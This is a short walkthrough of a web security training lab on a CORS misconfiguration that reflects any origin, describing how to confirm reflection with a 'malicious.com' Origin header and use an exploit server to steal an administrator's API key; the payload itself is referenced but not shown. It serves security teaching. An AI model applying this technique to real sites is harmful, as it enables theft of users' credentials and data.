Web Academy Lab: CORS vulnerability with basic origin reflection

CORS stands for Cross-Origin Resource Sharing. It is a mechanism that allows web browsers to make requests to a different domain than the one serving the original web page. This mechanism is enforced by the browser to mitigate potential security risks associated with cross-origin requests.

Lab description:

This website has an insecure CORS configuration in that it trusts all origins. To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server. The lab is solved when you successfully submit the administrator’s API key.

You can log in to your own account using the following credentials: wiener:peter

Steps:

Access the lab and login to the application using credential wiener:peter.

Review the proxy history in burp-suite and observe that your key is retrieved via an AJAX request to /accountDetails, and the response contains the Access-Control-Allow-Credentials which suggesting that it may support CORS.

We can see that the Access-Control-Allow-Credentials: true is present, let’s try to duplicate this request and change the Origin header to something like Origin: https://malicious.com and see if this value is reflected, the resulting response will be something like this:

The Origin set in the request headers is present in the Access-Control-Allow-Origin response headers, this confirms us that this request has a CORS vulnerability.

Now, go to the exploit server and type the Following payload with “LAB-ID”

Deliver the exploit to the victim and observe the API key of the administrator user in Access log.

After Check access logs and Now you will get the API key of the Victim, Submit the key in the solution to solve the Lab